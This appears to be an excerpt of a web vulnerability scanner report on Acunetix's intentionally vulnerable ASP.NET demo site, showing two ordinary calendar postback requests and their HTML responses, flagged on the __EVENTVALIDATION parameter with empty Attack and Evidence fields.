Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8162&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAf4e8L9oIZGRkLUUjlU2nMY9w8TeE20klx8uIaos%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLBvf22DwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esP2cuD3ccWpxs90gaNbfkdnsmKnU8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:29 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAf4e8L9oIZGRkLUUjlU2nMY9w8TeE20klx8uIaos=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLBvf22DwK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esP2cuD3ccWpxs90gaNbfkdnsmKnU8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:White" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1115 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,115 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8317&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI%2Fo9oIHgJTRBYBBgAAhzWJqdoIZGRkmK4Kw9LWSmdLyKFIUFyjewL5BFk%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLbxpHyAwLiidrKBQL%2BkPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr%2FDwKo4Jr%2FDwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD%2BhwoCqOD%2BhwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33%2BOIFAo33%2BOIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd%2BJCgLmnd%2BJCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY%2B9DQLmnY%2B9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0%2FAvukvT8C%2B6TR0wkC%2B6TR0wkC%2B6TF9gIC%2B6TF9gL%2B3cS%2FEZzVS02YiTJsPpHexRuQng%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:17:35 GMT Content-Length: 12597
Response Body - size: 12,597 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgAAOeI/o9oIHgJTRBYBBgAAhzWJqdoIZGRkmK4Kw9LWSmdLyKFIUFyjewL5BFk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLbxpHyAwLiidrKBQL+kPzjAQLX2ajvAgLX2ajvAgLX2dyDCgLX2dyDCgLX2fCmAwLX2fCmAwLX2eT9DALX2eT9DALX2ZiQBALX2ZiQBALX2cz5AgLX2cz5AgLX2eCcCgLX2eCcCgKo4PKFDQKo4PKFDQKo4ObYBgKo4ObYBgKo4Jr/DwKo4Jr/DwKo4I6SBwKo4I6SBwKo4KIpAqjgoikCqODWzQkCqODWzQkCqODK4AICqODK4AICqOD+hwoCqOD+hwoCqODS7AgCqODS7AgCqODGAwKo4MYDAo330KgDAo330KgDAo33xM8MAo33xM8MAo33+OIFAo33+OIFAo337LkNAo337LkNAo33gNwGAo33gNwGAo33tPMPAo33tPMPAo33qJYHAo33qJYHAo333CoCjffcKgKN97CSDQKN97CSDQKN96SpBgKN96SpBgLmnbfeCQLmnbfeCQLmnav1AgLmnav1AgLmnd+JCgLmnd+JCgLmnfOsAwLmnfOsAwLmnefDDALmnefDDALmnZvmBQLmnZvmBQLmnY+9DQLmnY+9DQLmnaPQBgLmnaPQBgLmnZe5AwLmnZe5AwLmnYvcDALmnYvcDAL7pJXFDwL7pJXFDwL7pImYBwL7pImYBwL7pL0/AvukvT8C+6TR0wkC+6TR0wkC+6TF9gIC+6TF9gL+3cS/EZzVS02YiTJsPpHexRuQng==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8279')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">October 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8317')" style="color:White" title="October 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8318')" style="color:Black" title="October 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8319')" style="color:Black" title="October 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8320')" style="color:Black" title="October 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8321')" style="color:Black" title="October 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8322')" style="color:Black" title="October 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8323')" style="color:Black" title="October 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8324')" style="color:Black" title="October 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8325')" style="color:Black" title="October 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8326')" style="color:Black" title="October 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8327')" style="color:Black" title="October 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8328')" style="color:Black" title="October 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8329')" style="color:Black" title="October 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8330')" style="color:Black" title="October 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8331')" style="color:Black" title="October 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8332')" style="color:Black" title="October 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8333')" style="color:Black" title="October 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8334')" style="color:Black" title="October 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8335')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8336')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8337')" style="color:Black" title="October 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8338')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8339')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8340')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8341')" style="color:Black" title="November 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8342')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8343')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8344')" style="color:Black" title="November 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
